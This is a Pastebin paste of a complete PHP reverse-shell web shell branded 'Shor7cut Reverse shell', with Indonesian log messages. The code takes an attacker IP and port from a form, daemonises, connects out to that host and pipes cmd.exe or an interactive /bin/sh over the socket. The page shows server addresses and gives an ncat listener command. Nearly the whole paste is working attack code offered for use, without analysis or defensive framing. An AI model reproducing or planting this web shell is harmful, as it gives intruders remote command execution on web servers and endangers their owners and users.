Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- SHOR7CUT | BUG7SEC
- */
- error_reporting(0);
- if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
- $os = "Windows";
- }else{
- $os = "Linux";
- }
- if (!empty($_SERVER['HTTP_CLIENT_IP'])){
- $ipaddress=$_SERVER['HTTP_CLIENT_IP'];
- }elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){
- $ipaddress=$_SERVER['HTTP_X_FORWARDED_FOR'];
- }else{
- $ipaddress=$_SERVER['REMOTE_ADDR'];
- }
- /* ---------------------------- */
- set_time_limit (0);
- if($_POST['submit']){
- $VERSION = "1.0";
- $ip = $_POST['ip'];
- $port = $_POST['port'];
- $chunk_size = 1400;
- $write_a = null;
- $error_a = null;
- if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
- $shell = "C:\\Windows\\system32\\cmd.exe";
- }else{
- $shell = "uname -a; w; id; /bin/sh -i";
- }
- $daemon = 0;
- $debug = 0;
- if (function_exists('pcntl_fork')) {
- $pid = pcntl_fork();
- if ($pid == -1) {
- print("ERROR: Can't fork");
- exit(1);
- }
- if ($pid) {
- exit(0);
- }
- if (posix_setsid() == -1) {
- print("Error: Can't setsid()");
- exit(1);
- }
- $daemon = 1;
- } else {
- $pesan.= "<font color=red>.[LOG]Gagal ke daemonise , ini tidak fatal.</font><br>";
- header("Location: ?pesan=$pesan");
- }
- chdir("/");umask(0);
- $sock = fsockopen($ip, $port, $errno, $errstr, 30);
- if (!$sock) {
- print("$errstr ($errno)");
- exit(1);
- }
- $descriptorspec = array(
- 0 => array("pipe", "r"),
- 1 => array("pipe", "w"),
- 2 => array("pipe", "w")
- );
- $process = proc_open($shell, $descriptorspec, $pipes);
- if (!is_resource($process)) {
- $pesan.= "<font color=red>.[LOG]Tidak bisa memuat shell.</font><br>";
- header("Location: ?pesan=$pesan");
- exit(1);
- }
- stream_set_blocking($pipes[0], 0);
- stream_set_blocking($pipes[1], 0);
- stream_set_blocking($pipes[2], 0);
- stream_set_blocking($sock, 0);
- $pesan.= "<font color=white>.[LOG]reverse shell berhasil ke $ip:$port.</font><br>";
- header("Location: ?pesan=$pesan");
- $is = 1;
- for ($i=0; $i <$is; $i++) {
- if (feof($sock)) {
- $pesan.= "<font color=red>.[LOG]Koneksi shell terputus.</font><br>";
- header("Location: ?pesan=$pesan");
- break;
- }
- if (feof($pipes[1])) {
- $pesan.= "<font color=red>.[LOG]Koneksi shell terputus.</font><br>";
- header("Location: ?pesan=$pesan");
- break;
- }
- $read_a = array($sock, $pipes[1], $pipes[2]);
- $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
- if (in_array($sock, $read_a)) {
- if ($debug) print("SOCK READ");
- $input = fread($sock, $chunk_size);
- if ($debug) print("SOCK: $input");
- fwrite($pipes[0], $input);
- }
- if (in_array($pipes[1], $read_a)) {
- if ($debug) print("STDOUT READ");
- $input = fread($pipes[1], $chunk_size);
- if ($debug) print("STDOUT: $input");
- fwrite($sock, $input);
- }
- if (in_array($pipes[2], $read_a)) {
- if ($debug) print("STDERR READ");
- $input = fread($pipes[2], $chunk_size);
- if ($debug) print("STDERR: $input");
- fwrite($sock, $input);
- }
- flush();
- ob_flush();
- $is++;
- }
- fclose($sock);
- fclose($pipes[0]);
- fclose($pipes[1]);
- fclose($pipes[2]);
- proc_close($process);
- function printit ($string) {
- if (!$daemon) {
- $pesan.= "<font color=red>.[LOG]$string.</font><br>";
- header("Location: ?pesan=$pesan");
- }
- }
- }else{
- ?>
- <!DOCTYPE html>
- <html>
- <head>
- <title>Shor7cut Reverse shell</title>
- <link rel='shortcut icon' type='image/x-icon' href='http://s24.postimg.org/glkiiddg5/frog_152630_1280.png' />
- <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.4.0/css/font-awesome.min.css">
- <meta name="description" content="Shor7cut Reverse shell">
- <meta name="viewport" content="width=device-width, initial-scale=1">
- <style type="text/css">
- body {
- background: black;
- color: #00FF00;
- font-family: monospace;
- }
- .accessGranted {
- position: absolute;
- top: 200px;
- background: #333;
- padding: 20px;
- border: 1px solid #999;
- width: 300px;
- left: 50%;
- margin-left: -150px;
- text-align: center;
- }
- .accessDenied {
- position: absolute;
- top: 200px;
- color: #F00;
- background: #511;
- padding: 20px;
- border: 1px solid #F00;
- width: 300px;
- left: 50%;
- margin-left: -150px;
- text-align: center;
- }
- #content-center {
- width: 400px;
- padding: 0px 10px 10px 10px;
- width: 800px;
- margin: 0 auto;
- }
- #content-left {
- margin: 0 auto;
- text-align: left;
- }
- #content-right {
- margin: 0 auto;
- text-align: right;
- }
- input,select,textarea{
- border:0;
- border:1px solid #900;
- background:black;
- margin:0;
- color: white;
- padding:2px 4px;
- }
- input:hover,textarea:hover,select:hover{
- background:black;
- color: red;
- border:1px solid #f00;
- }
- a{ text-decoration:none; color:red;}
- </style>
- </head>
- <body>
- <div id="content-center">
- <pre>
- __________ .__ .__ .__
- \______ \ _______ __ ___________ ______ ____ _____| |__ ____ | | | |
- | _// __ \ \/ // __ \_ __ \/ ___// __ \ / ___/ | \_/ __ \| | | |
- | | \ ___/\ /\ ___/| | \/\___ \\ ___/ \___ \| Y \ ___/| |_| |__
- |____|_ /\___ >\_/ \___ >__| /____ >\___ > /____ >___| /\___ >____/____/
- \/ \/ \/ \/ \/ \/ \/ \/
- </pre>
- <form action="" method="POST">
- IP Attacker : <input type="text" name="ip" value="<?= $ipaddress;?>">
- <select name="port">
- <option value="3202">3202</option>
- <option value="1337">1337</option>
- <option value="3813">3813</option>
- <option value="4444">4444</option>
- <option value="70847">70847</option>
- <option value="1337">1337</option>
- <option value="6677">6677</option>
- <option value="1313">1313</option>
- <option value="130707">130707</option>
- </select>
- <!--
- Port Attacker : <input type="text" name="port">
- -->
- <input type="hidden" name="run" value="1">
- <input type="submit" name="submit" value=">>">
- </form>
- <?php
- if($_GET['pesan']){?>
- <pre>
- .-----------------[ LOG INFO ]-----------------.
- <?= $_GET['pesan'];?>
- .--------------------------------------------.-.
- </pre>
- <?php
- }
- ?>
- <pre>
- .-----------------[ SYS INFO ]-------------------.
- .[OS] : <?= $os."\r\n";?>
- .[IP Local] : <?= $_SERVER['SERVER_ADDR']."/".gethostbyname($_SERVER['SERVER_NAME'])."\r\n";?>
- .[IP Attacker] : <?= $ipaddress."\r\n";?>
- .------------------------------------------------.
- . Reverse shell : Windows or Linux
- .------------------------------------------------.
- .------------------------------------------------.
- . Command : ncat -vv -n -l -p {port}
- .------------------------------------------------.
- SHOR7CUT | <font color="red">BUG</font><i class="fa fa-bug"></i><font color="white">7SEC</font> | Learn and become an expert
- </pre>
- </div>
- </body>
- </html>
- <?php
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement